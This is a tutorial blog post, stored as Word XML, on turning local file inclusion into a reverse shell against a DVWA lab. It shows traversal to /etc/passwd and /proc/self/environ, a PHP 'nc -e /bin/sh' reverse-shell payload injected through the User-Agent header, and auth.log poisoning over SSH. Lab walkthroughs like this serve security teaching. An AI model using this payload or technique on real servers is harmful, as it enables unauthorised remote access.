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349F8E" w14:paraId="36C60AF0" wp14:textId="1D45E17F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr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From Local File Inclusion to Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="78B79A43" wp14:textId="4A418FBE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr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What is a file inclusion vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="253DCD94" wp14:textId="3EE806C8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A file inclusion vulnerability occurs when a web application takes a file path as an input, which can lead to confidential data exposure, XSS, remote code execution, and even a reverse shell(we’ll talk about this for now).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21660F23" wp14:textId="10E851A2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File inclusion vulnerabilities are of two types Local File Inclusion(LFI) and Remote File Inclusion(RFI), but for the sake of this blog, we’ll only talk about LFI.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="08E9B337" wp14:textId="55256F1E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Local File Inclusion vulnerability allows the attacker to read system local files, perform XSS, and can even lead to code execution.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="30253DC2" wp14:textId="1BEEBEAE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr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How to identify Local File Inclusion (LFI)?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7D2CD933" wp14:textId="52473704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whenever we spot a URL for example</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6167301F" wp14:textId="6024A08D">
      <w:hyperlink r:id="Rc8a23a294a75417e">
        <w:r w:rsidRPr="6E349F8E" w:rsidR="6E349F8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http://www.test.com/?page=something.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7BFEA584" wp14:textId="25B60FA2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We can perform directory traversal to find out if the website is vulnerable to LFI or not for example we can replace “something.php” with “../../../../../etc/passwd” , which’ll expose the system passwords, but since our focus in this blog is primarily on reverse shell , which is much more powerful .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2688F6FD" wp14:textId="5253C397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We’ll traverse to these two directories to achieve our goal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="5BCA3E60" wp14:textId="629B9D1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/proc/self/environ ; This file contains the variables of the current environment, we will try to manipulate the value of these variables to achieve our nasty goal.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="6A2772C1" wp14:textId="0CAAA66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/var/log/auth.log; This file contains authorization information logged by various processes .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="78A112F5" wp14:textId="4717C1C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr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Getting a Reverse Shell ( Method -1 )</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="468305DB" wp14:textId="699AAA11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We’ll use DVWA for testing purpose .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="05F5CD19" wp14:textId="67572347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Let’s first try to find if the url is somwhere similar to</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1AF292EC" wp14:textId="592544B3">
      <w:hyperlink r:id="R4489ec37343f4dbf">
        <w:r w:rsidRPr="6E349F8E" w:rsidR="6E349F8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http://www.test.com/?page=something.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="63D9A0AD" wp14:textId="15E77398">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="65F04EB5" wp14:anchorId="72FBF4AF">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184978892" name="" descr="F,{c66eb1c3-9475-472d-8732-81f15bf95608}{193},12.52083,7.06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62cbd424d940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47A6844" wp14:textId="3E5AA30F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we can see the url is</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="10E33B23" wp14:textId="48B3AB54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172.16.177.140/dvwa/vulneribilities/fi/?page=include.php</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19437E46" wp14:textId="44ABDB4B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Now , we can perform directory traversal to find if the website is vulnerable to LFI or not.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="06782171" wp14:textId="669B1D53">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="31FCEB15" wp14:anchorId="6FD55ECB">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1553173046" name="" descr="F,{c66eb1c3-9475-472d-8732-81f15bf95608}{222},12.52083,7.06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1e15941a1349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F601DA3" wp14:textId="3CF96764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Since we can see that we are able to read the /proc/self/environ, this means this website is vulnerable to LFI, now we’ll see where can inject our PHP script in order to get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A36070E" wp14:textId="6BAC4FD4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If we read the output carefully we can see that there’s a field USER_AGENT, the USER_AGENT is a request header field that contains the information about the user agent originating the request, what if we can inject something in this field?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51749F29" wp14:textId="00B1D029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Let’s do it!</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5D6B6F2E" wp14:textId="7BB8B9BE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Let’s start our Burp proxy , and let’s analyse the request reloading this page</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5FC97FB7" wp14:textId="3F11D450">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="030208E2" wp14:anchorId="38DDB656">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1312057822" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{3},12.52083,7.333333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68eba683b842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274B62C" wp14:textId="32CC6445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Now let’s replace the data in user agent field with our payload .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5E54C557" wp14:textId="199BD613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&lt;?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="40DDC4F4" wp14:textId="2995EABE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passthru(“nc -e /bin/sh 172.16.177.175 69”);</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="49399303" wp14:textId="2EFDA988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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62F120F0" wp14:textId="3D2D2317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This is our PHP payload, let me explain to you what it does</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="581D15FB" wp14:textId="0C504541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So we are using Netcat to make the target machine connect back to us, with a shell, just replace the IP with your public IP and port with your desired port number and you’re good to go.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="776A4B9C" wp14:textId="6795D81D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Let’s listen on you machine for the incoming connections</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="123DA630" wp14:textId="7260A64D">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="1DDF219E" wp14:anchorId="78B46899">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="748496857" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{60},12.52083,5.937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7b0fbbebd04c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ED33F62" wp14:textId="73F5123C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Now we’ll change the user agent field</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="78BF6422" wp14:textId="0BD4616A">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="5772696D" wp14:anchorId="088C8595">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1243751308" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{75},12.52083,3.812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6355071c5e4b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776DC00" wp14:textId="00057C75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Once we have replaced the User-Agent field with our payload let’s forward it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="36944355" wp14:textId="5BE9E0F1">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="70AD65D2" wp14:anchorId="47F0D7DE">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="354057145" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{90},12.52083,5.9375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ba0cc977754a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5C3BC45" wp14:textId="3DF34F7A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Here we go !</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="007B1835" wp14:textId="1EDF325E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we have sucessfully exploited the website using LFI vulneribility.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="0AC3E244" wp14:textId="655EEB1C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr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Getting a Reverse Shell ( Method 2 )</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="31F245D2" wp14:textId="47E8EA55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Let’s perform directory traversal again , but this time we’ll traverse for the file. /var/log/auth.log.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02E4FBCB" wp14:textId="1759912B">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="638152D5" wp14:anchorId="4DA07F3E">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1074938107" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{132},12.52083,7.270833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02b44e038c46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09F1D5B" wp14:textId="052FABCD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We get alot of data here , now let’s try to login using ssh , if we do everything right then the auth.log file must show our ssh log in auth.log so let’s do it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="49E1D0BB" wp14:textId="787AC66F">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="078404FE" wp14:anchorId="4EA44382">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2100233590" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{147},12.52083,6.020833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bacfaddcda4c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9AE339A" wp14:textId="57D9B7D4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So let’s try to login with any random name , here we have the name as achkar and we’ll enter any random password , since our goal is just to list our log not to bypass login.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="246CA577" wp14:textId="03978ADF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Now let’s go the that same page , reload and try to find the username we tried to login with .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3A9B1D43" wp14:textId="57DA4C28">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="7C671F26" wp14:anchorId="18109D5A">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2134639582" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{169},12.52083,5.854167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73c6a898d94f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7C1A36E" wp14:textId="1A4292AD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Beautiful , now we can confirm that the server is processing our query and also listing it in the auth.log file , now let’s try to inject our payload using ssh .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="35FC7155" wp14:textId="30310F36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We will use the same payload that we used before .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4E7CF679" wp14:textId="40EB6EA6">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="63DF219C" wp14:anchorId="65990C7A">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1633744914" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{191},12.52083,0.7916667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3a1af73ae247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7298A1E" wp14:textId="7CD8F894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Since , we cannot pass the payload as it is , so we’ve encoded it using base64 cipher and later on it’ll decode itself once it reaches the target .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="767F944F" wp14:textId="2654F005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Now let’s listen for incoming connections on our machine</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2545A54C" wp14:textId="638FD044">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="6188D547" wp14:anchorId="376390C0">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1879563407" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{213},12.52083,1.291667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43a9a77f2144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0F03502" wp14:textId="438DE3C3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Now , once we reload the page</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0988086E" wp14:textId="24AEDF08">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="57B28BD0" wp14:anchorId="007EC3D8">
            <wp:extent cx="342900" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1894571639" name="" descr="F,{c3b6bc7b-ab4b-49c8-a2f1-f16c68ba3e52}{228},12.52083,4.770833" title="Image download failed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1cad3c51c343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FA0C126" wp14:textId="644E784D"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Here we have our reverse shell .</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="2CEEF801" wp14:textId="392005C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="4B610951" wp14:textId="12054A1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File inclusion vulnerability occurs when the user can pass the file path in the input</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="3BBA33A8" wp14:textId="46216E3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To find if the website is vulnerable to LFI always try directory traversal.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="3A6868B0" wp14:textId="612C1CA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Try to access different files and see which parameter you can change according to your benefit.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="7153BB20" wp14:textId="1EE1F8A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6E349F8E" w:rsidR="6E349F8E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>I would like to end this blog by quoting ‘The difference between a noob and a hacker is that a hacker has failed more than a noob has ever tried”.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E349F8E" w14:paraId="2DC08235" wp14:textId="1716C09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874d1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BC30FA"/>
    <w:rsid w:val="12BC30FA"/>
    <w:rsid w:val="6E349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30FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FD125956-436B-4068-8DB7-4E6FB6BEEF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test.com/?page=something.php" TargetMode="External" Id="Rc8a23a294a75417e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.test.com/?page=something.php" TargetMode="External" Id="R4489ec37343f4dbf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R6162cbd424d940e4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R111e15941a1349a7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="Ra968eba683b842c0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rde7b0fbbebd04cb6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R176355071c5e4b9a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R9bba0cc977754afc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="Rd102b44e038c468a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R0dbacfaddcda4c4d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Rb873c6a898d94fcb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R773a1af73ae2475c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="Rfc43a9a77f214476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R321cad3c51c34300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="/word/numbering.xml" Id="Rf7f52d6109a943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2022-07-28T19:39:23.5730332Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-28T19:39:56.1901369Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>